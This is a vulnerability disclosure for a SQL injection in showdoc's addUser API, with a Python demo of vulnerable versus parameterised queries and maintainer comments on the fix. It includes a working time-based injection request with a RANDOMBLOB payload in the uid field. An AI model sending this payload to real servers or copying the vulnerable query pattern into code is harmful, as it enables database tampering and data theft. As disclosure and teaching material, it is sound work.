SQL Injection in star7th/showdoc

Valid

Reported on

Jan 25th 2022


Description

The uid parameter of the addUser API is not sanitised or escaped before it is used in a SQL statement, which could lead to SQL injection.
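The contrast the description is getting at, as an added example that is not showdoc's code and not the fix commit: a lookup that interpolates uid into the statement accepts the quote-breaking shape of the payload above as SQL, while a parameterised lookup compares the same string literally and matches nothing. Python's sqlite3 stands in for the PHP application (showdoc ships with SQLite), and the table user_info with its uid/username columns and the two rows are constructed for this demonstration.

```python
import sqlite3


def make_db():
    # Constructed sample schema and data, not showdoc's own.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_info (uid INTEGER, username TEXT)")
    conn.executemany(
        "INSERT INTO user_info VALUES (?, ?)", [(10, "alice"), (11, "bob")]
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn, uid):
    # Vulnerable pattern: the untrusted request value is pasted into the
    # statement text, so a quote inside it terminates the literal and the
    # rest is parsed as SQL.
    sql = "SELECT uid, username FROM user_info WHERE uid = '%s'" % uid
    return conn.execute(sql).fetchall()


def find_user_safe(conn, uid):
    # Hardened pattern: the value is bound as a parameter. Whatever it
    # contains is compared as a single literal and never parsed as SQL.
    sql = "SELECT uid, username FROM user_info WHERE uid = ?"
    return conn.execute(sql, (uid,)).fetchall()


def parse_uid(raw):
    # Defence in depth: uid is an integer id, so reject anything that is
    # not a plain non-negative integer before it reaches the database.
    raw = str(raw).strip()
    if not raw.isdigit():
        raise ValueError("uid must be a non-negative integer")
    return int(raw)


if __name__ == "__main__":
    db = make_db()
    tainted = "10' and '1'='1"  # same shape as the report's payload
    print("vulnerable:", find_user_vulnerable(db, tainted))  # row for uid 10
    print("parameterised:", find_user_safe(db, tainted))  # no rows
    try:
        parse_uid(tainted)
    except ValueError as exc:
        print("validation:", exc)
```

The parameterised query alone closes the injection; parse_uid is the extra allowlist check that turns a malformed uid into a 4xx response instead of a database round trip, which also gives a clean signal to log and alert on.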

Proof of Concept

Time based:

POST /server/index.php?s=/api/adminUser/addUser HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Cookie: PHPSESSID=c35a50119eee7d09650616215ccc2693; think_language=en-US; cookie_token=248df88efcc25f6b5aef3ad5cf4fd2c145be19155add1c78609427a37f88d267
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: host.com
Connection: Keep-alive

name=laladee&uid=10'+and+1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))+and+'1'='1&username=laladee

Impact

A successful attack may result in the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to the database, writing files to the server leading to remote code execution, or writing scripts to extract data.

We are processing your report and will contact the star7th/showdoc team within 24 hours. 4 months ago
laladee submitted a
4 months ago
star7th validated this vulnerability 4 months ago
laladee has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th
4 months ago

Maintainer


I've fixed it. You can check it https://github.com/star7th/showdoc/commit/2b34e267e4186125f99bfa420140634ad45801fb

laladee
4 months ago

Researcher


Yes, I've submitted a patch above :) however, the issue has been resolved.

star7th confirmed that a fix has been merged on 2b34e2 4 months ago
star7th has been awarded the fix bounty
star7th
4 months ago

Maintainer


I found that there was a patch, but I didn't notice it. I fixed all the problems that others fed back before, so I habitually didn't see the patch. Pay attention next time.
